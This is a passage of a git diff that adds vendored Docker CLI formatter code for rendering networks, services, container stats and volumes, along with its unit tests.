+		{"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", "Scope": ""},
+	}
+
+	out := bytes.NewBufferString("")
+	err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var m map[string]interface{}
+		if err := json.Unmarshal([]byte(line), &m); err != nil {
+			t.Fatal(err)
+		}
+		assert.DeepEqual(t, m, expectedJSONs[i])
+	}
+}
+
+func TestNetworkContextWriteJSONField(t *testing.T) {
+	networks := []types.NetworkResource{
+		{ID: "networkID1", Name: "foobar_baz"},
+		{ID: "networkID2", Name: "foobar_bar"},
+	}
+	out := bytes.NewBufferString("")
+	err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
+		t.Logf("Output: line %d: %s", i, line)
+		var s string
+		if err := json.Unmarshal([]byte(line), &s); err != nil {
+			t.Fatal(err)
+		}
+		assert.Equal(t, s, networks[i].ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go
new file mode 100644
index 0000000000..d1d8737d21
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go
@@ -0,0 +1,65 @@
+package formatter
+
+import (
+	"encoding/json"
+	"fmt"
+	"reflect"
+	"unicode"
+)
+
+func marshalJSON(x interface{}) ([]byte, error) {
+	m, err := marshalMap(x)
+	if err != nil {
+		return nil, err
+	}
+	return json.Marshal(m)
+}
+
+// marshalMap marshals x to map[string]interface{}
+func marshalMap(x interface{}) (map[string]interface{}, error) {
+	val := reflect.ValueOf(x)
+	if val.Kind() != reflect.Ptr {
+		return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind())
+	}
+	if val.IsNil() {
+		return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer")
+	}
+	valElem := val.Elem()
+	if valElem.Kind() != reflect.Struct {
+		return nil, fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind())
+	}
+	typ := val.Type()
+	m := make(map[string]interface{})
+	for i := 0; i < val.NumMethod(); i++ {
+		k, v, err := marshalForMethod(typ.Method(i), val.Method(i))
+		if err != nil {
+			return nil, err
+		}
+		if k != "" {
+			m[k] = v
+		}
+	}
+	return m, nil
+}
+
+var unmarshallableNames = map[string]struct{}{"FullHeader": {}}
+
+// marshalForMethod returns the map key and the map value for marshalling the method.
+// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()")
+func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) {
+	if val.Kind() != reflect.Func {
+		return "", nil, fmt.Errorf("expected func, got %v", val.Kind())
+	}
+	name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut()
+	_, blackListed := unmarshallableNames[name]
+	// FIXME: In text/template, (numOut == 2) is marshallable,
+	//        if the type of the second param is error.
+	marshallable := unicode.IsUpper(rune(name[0])) && !blackListed &&
+		numIn == 0 && numOut == 1
+	if !marshallable {
+		return "", nil, nil
+	}
+	result := val.Call(make([]reflect.Value, numIn))
+	intf := result[0].Interface()
+	return name, intf, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
new file mode 100644
index 0000000000..e547b18411
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
@@ -0,0 +1,66 @@
+package formatter
+
+import (
+	"reflect"
+	"testing"
+)
+
+type dummy struct {
+}
+
+func (d *dummy) Func1() string {
+	return "Func1"
+}
+
+func (d *dummy) func2() string {
+	return "func2(should not be marshalled)"
+}
+
+func (d *dummy) Func3() (string, int) {
+	return "Func3(should not be marshalled)", -42
+}
+
+func (d *dummy) Func4() int {
+	return 4
+}
+
+type dummyType string
+
+func (d *dummy) Func5() dummyType {
+	return dummyType("Func5")
+}
+
+func (d *dummy) FullHeader() string {
+	return "FullHeader(should not be marshalled)"
+}
+
+var dummyExpected = map[string]interface{}{
+	"Func1": "Func1",
+	"Func4": 4,
+	"Func5": dummyType("Func5"),
+}
+
+func TestMarshalMap(t *testing.T) {
+	d := dummy{}
+	m, err := marshalMap(&d)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(dummyExpected, m) {
+		t.Fatalf("expected %+v, got %+v",
+			dummyExpected, m)
+	}
+}
+
+func TestMarshalMapBad(t *testing.T) {
+	if _, err := marshalMap(nil); err == nil {
+		t.Fatal("expected an error (argument is nil)")
+	}
+	if _, err := marshalMap(dummy{}); err == nil {
+		t.Fatal("expected an error (argument is non-pointer)")
+	}
+	x := 42
+	if _, err := marshalMap(&x); err == nil {
+		t.Fatal("expected an error (argument is a pointer to non-struct)")
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go
new file mode 100644
index 0000000000..aaa78386cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/service.go
@@ -0,0 +1,322 @@
+package formatter
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/command/inspect"
+	units "github.com/docker/go-units"
+)
+
+const serviceInspectPrettyTemplate Format = `
+ID:		{{.ID}}
+Name:		{{.Name}}
+{{- if .Labels }}
+Labels:
+{{- range $k, $v := .Labels }}
+ {{ $k }}{{if $v }}={{ $v }}{{ end }}
+{{- end }}{{ end }}
+Service Mode:
+{{- if .IsModeGlobal }}	Global
+{{- else if .IsModeReplicated }}	Replicated
+{{- if .ModeReplicatedReplicas }}
+ Replicas:	{{ .ModeReplicatedReplicas }}
+{{- end }}{{ end }}
+{{- if .HasUpdateStatus }}
+UpdateStatus:
+ State:		{{ .UpdateStatusState }}
+ Started:	{{ .UpdateStatusStarted }}
+{{- if .UpdateIsCompleted }}
+ Completed:	{{ .UpdateStatusCompleted }}
+{{- end }}
+ Message:	{{ .UpdateStatusMessage }}
+{{- end }}
+Placement:
+{{- if .TaskPlacementConstraints -}}
+ Contraints:	{{ .TaskPlacementConstraints }}
+{{- end }}
+{{- if .HasUpdateConfig }}
+UpdateConfig:
+ Parallelism:	{{ .UpdateParallelism }}
+{{- if .HasUpdateDelay}}
+ Delay:		{{ .UpdateDelay }}
+{{- end }}
+ On failure:	{{ .UpdateOnFailure }}
+{{- if .HasUpdateMonitor}}
+ Monitoring Period: {{ .UpdateMonitor }}
+{{- end }}
+ Max failure ratio: {{ .UpdateMaxFailureRatio }}
+{{- end }}
+ContainerSpec:
+ Image:		{{ .ContainerImage }}
+{{- if .ContainerArgs }}
+ Args:		{{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }}
+{{- end -}}
+{{- if .ContainerEnv }}
+ Env:		{{ range $env := .ContainerEnv }}{{ $env }} {{ end }}
+{{- end -}}
+{{- if .ContainerWorkDir }}
+ Dir:		{{ .ContainerWorkDir }}
+{{- end -}}
+{{- if .ContainerUser }}
+ User: {{ .ContainerUser }}
+{{- end }}
+{{- if .ContainerMounts }}
+Mounts:
+{{- end }}
+{{- range $mount := .ContainerMounts }}
+  Target = {{ $mount.Target }}
+   Source = {{ $mount.Source }}
+   ReadOnly = {{ $mount.ReadOnly }}
+   Type = {{ $mount.Type }}
+{{- end -}}
+{{- if .HasResources }}
+Resources:
+{{- if .HasResourceReservations }}
+ Reservations:
+{{- if gt .ResourceReservationNanoCPUs 0.0 }}
+  CPU:		{{ .ResourceReservationNanoCPUs }}
+{{- end }}
+{{- if .ResourceReservationMemory }}
+  Memory:	{{ .ResourceReservationMemory }}
+{{- end }}{{ end }}
+{{- if .HasResourceLimits }}
+ Limits:
+{{- if gt .ResourceLimitsNanoCPUs 0.0 }}
+  CPU:		{{ .ResourceLimitsNanoCPUs }}
+{{- end }}
+{{- if .ResourceLimitMemory }}
+  Memory:	{{ .ResourceLimitMemory }}
+{{- end }}{{ end }}{{ end }}
+{{- if .Networks }}
+Networks:
+{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }}
+Endpoint Mode:	{{ .EndpointMode }}
+{{- if .Ports }}
+Ports:
+{{- range $port := .Ports }}
+ PublishedPort {{ $port.PublishedPort }}
+  Protocol = {{ $port.Protocol }}
+  TargetPort = {{ $port.TargetPort }}
+{{- end }} {{ end -}}
+`
+
+// NewServiceFormat returns a Format for rendering using a Context
+func NewServiceFormat(source string) Format {
+	switch source {
+	case PrettyFormatKey:
+		return serviceInspectPrettyTemplate
+	default:
+		return Format(strings.TrimPrefix(source, RawFormatKey))
+	}
+}
+
+// ServiceInspectWrite renders the context for a list of services
+func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error {
+	if ctx.Format != serviceInspectPrettyTemplate {
+		return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef)
+	}
+	render := func(format func(subContext subContext) error) error {
+		for _, ref := range refs {
+			serviceI, _, err := getRef(ref)
+			if err != nil {
+				return err
+			}
+			service, ok := serviceI.(swarm.Service)
+			if !ok {
+				return fmt.Errorf("got wrong object to inspect")
+			}
+			if err := format(&serviceInspectContext{Service: service}); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+	return ctx.Write(&serviceInspectContext{}, render)
+}
+
+type serviceInspectContext struct {
+	swarm.Service
+	subContext
+}
+
+func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) {
+	return marshalJSON(ctx)
+}
+
+func (ctx *serviceInspectContext) ID() string {
+	return ctx.Service.ID
+}
+
+func (ctx *serviceInspectContext) Name() string {
+	return ctx.Service.Spec.Name
+}
+
+func (ctx *serviceInspectContext) Labels() map[string]string {
+	return ctx.Service.Spec.Labels
+}
+
+func (ctx *serviceInspectContext) IsModeGlobal() bool {
+	return ctx.Service.Spec.Mode.Global != nil
+}
+
+func (ctx *serviceInspectContext) IsModeReplicated() bool {
+	return ctx.Service.Spec.Mode.Replicated != nil
+}
+
+func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 {
+	return ctx.Service.Spec.Mode.Replicated.Replicas
+}
+
+func (ctx *serviceInspectContext) HasUpdateStatus() bool {
+	return ctx.Service.UpdateStatus.State != ""
+}
+
+func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState {
+	return ctx.Service.UpdateStatus.State
+}
+
+func (ctx *serviceInspectContext) UpdateStatusStarted() string {
+	return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt))
+}
+
+func (ctx *serviceInspectContext) UpdateIsCompleted() bool {
+	return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted
+}
+
+func (ctx *serviceInspectContext) UpdateStatusCompleted() string {
+	return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt))
+}
+
+func (ctx *serviceInspectContext) UpdateStatusMessage() string {
+	return ctx.Service.UpdateStatus.Message
+}
+
+func (ctx *serviceInspectContext) TaskPlacementConstraints() []string {
+	if ctx.Service.Spec.TaskTemplate.Placement != nil {
+		return ctx.Service.Spec.TaskTemplate.Placement.Constraints
+	}
+	return nil
+}
+
+func (ctx *serviceInspectContext) HasUpdateConfig() bool {
+	return ctx.Service.Spec.UpdateConfig != nil
+}
+
+func (ctx *serviceInspectContext) UpdateParallelism() uint64 {
+	return ctx.Service.Spec.UpdateConfig.Parallelism
+}
+
+func (ctx *serviceInspectContext) HasUpdateDelay() bool {
+	return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0
+}
+
+func (ctx *serviceInspectContext) UpdateDelay() time.Duration {
+	return ctx.Service.Spec.UpdateConfig.Delay
+}
+
+func (ctx *serviceInspectContext) UpdateOnFailure() string {
+	return ctx.Service.Spec.UpdateConfig.FailureAction
+}
+
+func (ctx *serviceInspectContext) HasUpdateMonitor() bool {
+	return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0
+}
+
+func (ctx *serviceInspectContext) UpdateMonitor() time.Duration {
+	return ctx.Service.Spec.UpdateConfig.Monitor
+}
+
+func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 {
+	return ctx.Service.Spec.UpdateConfig.MaxFailureRatio
+}
+
+func (ctx *serviceInspectContext) ContainerImage() string {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image
+}
+
+func (ctx *serviceInspectContext) ContainerArgs() []string {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args
+}
+
+func (ctx *serviceInspectContext) ContainerEnv() []string {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env
+}
+
+func (ctx *serviceInspectContext) ContainerWorkDir() string {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir
+}
+
+func (ctx *serviceInspectContext) ContainerUser() string {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.User
+}
+
+func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount {
+	return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts
+}
+
+func (ctx *serviceInspectContext) HasResources() bool {
+	return ctx.Service.Spec.TaskTemplate.Resources != nil
+}
+
+func (ctx *serviceInspectContext) HasResourceReservations() bool {
+	if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil {
+		return false
+	}
+	return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0
+}
+
+func (ctx *serviceInspectContext) ResourceReservationNanoCPUs() float64 {
+	if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 {
+		return float64(0)
+	}
+	return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9
+}
+
+func (ctx *serviceInspectContext) ResourceReservationMemory() string {
+	if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 {
+		return ""
+	}
+	return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes))
+}
+
+func (ctx *serviceInspectContext) HasResourceLimits() bool {
+	if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil {
+		return false
+	}
+	return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0
+}
+
+func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 {
+	return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9
+}
+
+func (ctx *serviceInspectContext) ResourceLimitMemory() string {
+	if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 {
+		return ""
+	}
+	return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes))
+}
+
+func (ctx *serviceInspectContext) Networks() []string {
+	var out []string
+	for _, n := range ctx.Service.Spec.Networks {
+		out = append(out, n.Target)
+	}
+	return out
+}
+
+func (ctx *serviceInspectContext) EndpointMode() string {
+	if ctx.Service.Spec.EndpointSpec == nil {
+		return ""
+	}
+
+	return string(ctx.Service.Spec.EndpointSpec.Mode)
+}
+
+func (ctx *serviceInspectContext) Ports() []swarm.PortConfig {
+	return ctx.Service.Endpoint.Ports
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go
new file mode 100644
index 0000000000..7997f996d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/stats.go
@@ -0,0 +1,211 @@
+package formatter
+
+import (
+	"fmt"
+	"sync"
+
+	units "github.com/docker/go-units"
+)
+
+const (
+	winOSType                  = "windows"
+	defaultStatsTableFormat    = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}"
+	winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}"
+
+	containerHeader = "CONTAINER"
+	cpuPercHeader   = "CPU %"
+	netIOHeader     = "NET I/O"
+	blockIOHeader   = "BLOCK I/O"
+	memPercHeader   = "MEM %"             // Used only on Linux
+	winMemUseHeader = "PRIV WORKING SET"  // Used only on Windows
+	memUseHeader    = "MEM USAGE / LIMIT" // Used only on Linux
+	pidsHeader      = "PIDS"              // Used only on Linux
+)
+
+// StatsEntry represents represents the statistics data collected from a container
+type StatsEntry struct {
+	Container        string
+	Name             string
+	ID               string
+	CPUPercentage    float64
+	Memory           float64 // On Windows this is the private working set
+	MemoryLimit      float64 // Not used on Windows
+	MemoryPercentage float64 // Not used on Windows
+	NetworkRx        float64
+	NetworkTx        float64
+	BlockRead        float64
+	BlockWrite       float64
+	PidsCurrent      uint64 // Not used on Windows
+	IsInvalid        bool
+	OSType           string
+}
+
+// ContainerStats represents an entity to store containers statistics synchronously
+type ContainerStats struct {
+	mutex sync.Mutex
+	StatsEntry
+	err error
+}
+
+// GetError returns the container statistics error.
+// This is used to determine whether the statistics are valid or not
+func (cs *ContainerStats) GetError() error {
+	cs.mutex.Lock()
+	defer cs.mutex.Unlock()
+	return cs.err
+}
+
+// SetErrorAndReset zeroes all the container statistics and store the error.
+// It is used when receiving time out error during statistics collecting to reduce lock overhead
+func (cs *ContainerStats) SetErrorAndReset(err error) {
+	cs.mutex.Lock()
+	defer cs.mutex.Unlock()
+	cs.CPUPercentage = 0
+	cs.Memory = 0
+	cs.MemoryPercentage = 0
+	cs.MemoryLimit = 0
+	cs.NetworkRx = 0
+	cs.NetworkTx = 0
+	cs.BlockRead = 0
+	cs.BlockWrite = 0
+	cs.PidsCurrent = 0
+	cs.err = err
+	cs.IsInvalid = true
+}
+
+// SetError sets container statistics error
+func (cs *ContainerStats) SetError(err error) {
+	cs.mutex.Lock()
+	defer cs.mutex.Unlock()
+	cs.err = err
+	if err != nil {
+		cs.IsInvalid = true
+	}
+}
+
+// SetStatistics set the container statistics
+func (cs *ContainerStats) SetStatistics(s StatsEntry) {
+	cs.mutex.Lock()
+	defer cs.mutex.Unlock()
+	s.Container = cs.Container
+	s.OSType = cs.OSType
+	cs.StatsEntry = s
+}
+
+// GetStatistics returns container statistics with other meta data such as the container name
+func (cs *ContainerStats) GetStatistics() StatsEntry {
+	cs.mutex.Lock()
+	defer cs.mutex.Unlock()
+	return cs.StatsEntry
+}
+
+// NewStatsFormat returns a format for rendering an CStatsContext
+func NewStatsFormat(source, osType string) Format {
+	if source == TableFormatKey {
+		if osType == winOSType {
+			return Format(winDefaultStatsTableFormat)
+		}
+		return Format(defaultStatsTableFormat)
+	}
+	return Format(source)
+}
+
+// NewContainerStats returns a new ContainerStats entity and sets in it the given name
+func NewContainerStats(container, osType string) *ContainerStats {
+	return &ContainerStats{
+		StatsEntry: StatsEntry{Container: container, OSType: osType},
+	}
+}
+
+// ContainerStatsWrite renders the context for a list of containers statistics
+func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error {
+	render := func(format func(subContext subContext) error) error {
+		for _, cstats := range containerStats {
+			containerStatsCtx := &containerStatsContext{
+				s: cstats,
+			}
+			if err := format(containerStatsCtx); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+	return ctx.Write(&containerStatsContext{}, render)
+}
+
+type containerStatsContext struct {
+	HeaderContext
+	s StatsEntry
+}
+
+func (c *containerStatsContext) Container() string {
+	c.AddHeader(containerHeader)
+	return c.s.Container
+}
+
+func (c *containerStatsContext) Name() string {
+	c.AddHeader(nameHeader)
+	name := c.s.Name[1:]
+	return name
+}
+
+func (c *containerStatsContext) ID() string {
+	c.AddHeader(containerIDHeader)
+	return c.s.ID
+}
+
+func (c *containerStatsContext) CPUPerc() string {
+	c.AddHeader(cpuPercHeader)
+	if c.s.IsInvalid {
+		return fmt.Sprintf("--")
+	}
+	return fmt.Sprintf("%.2f%%", c.s.CPUPercentage)
+}
+
+func (c *containerStatsContext) MemUsage() string {
+	header := memUseHeader
+	if c.s.OSType == winOSType {
+		header = winMemUseHeader
+	}
+	c.AddHeader(header)
+	if c.s.IsInvalid {
+		return fmt.Sprintf("-- / --")
+	}
+	if c.s.OSType == winOSType {
+		return fmt.Sprintf("%s", units.BytesSize(c.s.Memory))
+	}
+	return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit))
+}
+
+func (c *containerStatsContext) MemPerc() string {
+	header := memPercHeader
+	c.AddHeader(header)
+	if c.s.IsInvalid || c.s.OSType == winOSType {
+		return fmt.Sprintf("--")
+	}
+	return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage)
+}
+
+func (c *containerStatsContext) NetIO() string {
+	c.AddHeader(netIOHeader)
+	if c.s.IsInvalid {
+		return fmt.Sprintf("--")
+	}
+	return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3))
+}
+
+func (c *containerStatsContext) BlockIO() string {
+	c.AddHeader(blockIOHeader)
+	if c.s.IsInvalid {
+		return fmt.Sprintf("--")
+	}
+	return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3))
+}
+
+func (c *containerStatsContext) PIDs() string {
+	c.AddHeader(pidsHeader)
+	if c.s.IsInvalid || c.s.OSType == winOSType {
+		return fmt.Sprintf("--")
+	}
+	return fmt.Sprintf("%d", c.s.PidsCurrent)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
new file mode 100644
index 0000000000..d5a17cc70e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
@@ -0,0 +1,228 @@
+package formatter
+
+import (
+	"bytes"
+	"testing"
+
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestContainerStatsContext(t *testing.T) {
+	containerID := stringid.GenerateRandomID()
+
+	var ctx containerStatsContext
+	tt := []struct {
+		stats     StatsEntry
+		expValue  string
+		expHeader string
+		call      func() string
+	}{
+		{StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container},
+		{StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc},
+		{StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc},
+		{StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO},
+		{StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO},
+		{StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO},
+		{StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO},
+		{StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc},
+		{StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc},
+		{StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc},
+		{StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage},
+		{StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage},
+		{StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage},
+		{StatsEntry{PidsCurrent: 10}, "10", pidsHeader, ctx.PIDs},
+		{StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs},
+		{StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs},
+	}
+
+	for _, te := range tt {
+		ctx = containerStatsContext{s: te.stats}
+		if v := te.call(); v != te.expValue {
+			t.Fatalf("Expected %q, got %q", te.expValue, v)
+		}
+
+		h := ctx.FullHeader()
+		if h != te.expHeader {
+			t.Fatalf("Expected %q, got %q", te.expHeader, h)
+		}
+	}
+}
+
+func TestContainerStatsContextWrite(t *testing.T) {
+	tt := []struct {
+		context  Context
+		expected string
+	}{
+		{
+			Context{Format: "{{InvalidFunction}}"},
+			`Template parsing error: template: :1: function "InvalidFunction" not defined
+`,
+		},
+		{
+			Context{Format: "{{nil}}"},
+			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
+`,
+		},
+		{
+			Context{Format: "table {{.MemUsage}}"},
+			`MEM USAGE / LIMIT
+20 B / 20 B
+-- / --
+`,
+		},
+		{
+			Context{Format: "{{.Container}}  {{.CPUPerc}}"},
+			`container1  20.00%
+container2  --
+`,
+		},
+	}
+
+	for _, te := range tt {
+		stats := []StatsEntry{
+			{
+				Container:        "container1",
+				CPUPercentage:    20,
+				Memory:           20,
+				MemoryLimit:      20,
+				MemoryPercentage: 20,
+				NetworkRx:        20,
+				NetworkTx:        20,
+				BlockRead:        20,
+				BlockWrite:       20,
+				PidsCurrent:      2,
+				IsInvalid:        false,
+				OSType:           "linux",
+			},
+			{
+				Container:        "container2",
+				CPUPercentage:    30,
+				Memory:           30,
+				MemoryLimit:      30,
+				MemoryPercentage: 30,
+				NetworkRx:        30,
+				NetworkTx:        30,
+				BlockRead:        30,
+				BlockWrite:       30,
+				PidsCurrent:      3,
+				IsInvalid:        true,
+				OSType:           "linux",
+			},
+		}
+		var out bytes.Buffer
+		te.context.Output = &out
+		err := ContainerStatsWrite(te.context, stats)
+		if err != nil {
+			assert.Error(t, err, te.expected)
+		} else {
+			assert.Equal(t, out.String(), te.expected)
+		}
+	}
+}
+
+func TestContainerStatsContextWriteWindows(t *testing.T) {
+	tt := []struct {
+		context  Context
+		expected string
+	}{
+		{
+			Context{Format: "table {{.MemUsage}}"},
+			`PRIV WORKING SET
+20 B
+-- / --
+`,
+		},
+		{
+			Context{Format: "{{.Container}}  {{.CPUPerc}}"},
+			`container1  20.00%
+container2  --
+`,
+		},
+		{
+			Context{Format: "{{.Container}}  {{.MemPerc}}  {{.PIDs}}"},
+			`container1  --  --
+container2  --  --
+`,
+		},
+	}
+
+	for _, te := range tt {
+		stats := []StatsEntry{
+			{
+				Container:        "container1",
+				CPUPercentage:    20,
+				Memory:           20,
+				MemoryLimit:      20,
+				MemoryPercentage: 20,
+				NetworkRx:        20,
+				NetworkTx:        20,
+				BlockRead:        20,
+				BlockWrite:       20,
+				PidsCurrent:      2,
+				IsInvalid:        false,
+				OSType:           "windows",
+			},
+			{
+				Container:        "container2",
+				CPUPercentage:    30,
+				Memory:           30,
+				MemoryLimit:      30,
+				MemoryPercentage: 30,
+				NetworkRx:        30,
+				NetworkTx:        30,
+				BlockRead:        30,
+				BlockWrite:       30,
+				PidsCurrent:      3,
+				IsInvalid:        true,
+				OSType:           "windows",
+			},
+		}
+		var out bytes.Buffer
+		te.context.Output = &out
+		err := ContainerStatsWrite(te.context, stats)
+		if err != nil {
+			assert.Error(t, err, te.expected)
+		} else {
+			assert.Equal(t, out.String(), te.expected)
+		}
+	}
+}
+
+func TestContainerStatsContextWriteWithNoStats(t *testing.T) {
+	var out bytes.Buffer
+
+	contexts := []struct {
+		context  Context
+		expected string
+	}{
+		{
+			Context{
+				Format: "{{.Container}}",
+				Output: &out,
+			},
+			"",
+		},
+		{
+			Context{
+				Format: "table {{.Container}}",
+				Output: &out,
+			},
+			"CONTAINER\n",
+		},
+		{
+			Context{
+				Format: "table {{.Container}}\t{{.CPUPerc}}",
+				Output: &out,
+			},
+			"CONTAINER           CPU %\n",
+		},
+	}
+
+	for _, context := range contexts {
+		ContainerStatsWrite(context.context, []StatsEntry{})
+		assert.Equal(t, context.expected, out.String())
+		// Clean buffer
+		out.Reset()
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go
new file mode 100644
index 0000000000..90c9b13536
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/formatter/volume.go
@@ -0,0 +1,121 @@
+package formatter
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	units "github.com/docker/go-units"
+)
+
+const (
+	defaultVolumeQuietFormat = "{{.Name}}"
+	defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}"
+
+	volumeNameHeader = "VOLUME NAME"
+	mountpointHeader = "MOUNTPOINT"
+	linksHeader      = "LINKS"
+	// Status header ?
+)
+
+// NewVolumeFormat returns a format for use with a volume Context
+func NewVolumeFormat(source string, quiet bool) Format {
+	switch source {
+	case TableFormatKey:
+		if quiet {
+			return defaultVolumeQuietFormat
+		}
+		return defaultVolumeTableFormat
+	case RawFormatKey:
+		if quiet {
+			return `name: {{.Name}}`
+		}
+		return `name: {{.Name}}\ndriver: {{.Driver}}\n`
+	}
+	return Format(source)
+}
+
+// VolumeWrite writes formatted volumes using the Context
+func VolumeWrite(ctx Context, volumes []*types.Volume) error {
+	render := func(format func(subContext subContext) error) error {
+		for _, volume := range volumes {
+			if err := format(&volumeContext{v: *volume}); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+	return ctx.Write(&volumeContext{}, render)
+}
+
+type volumeContext struct {
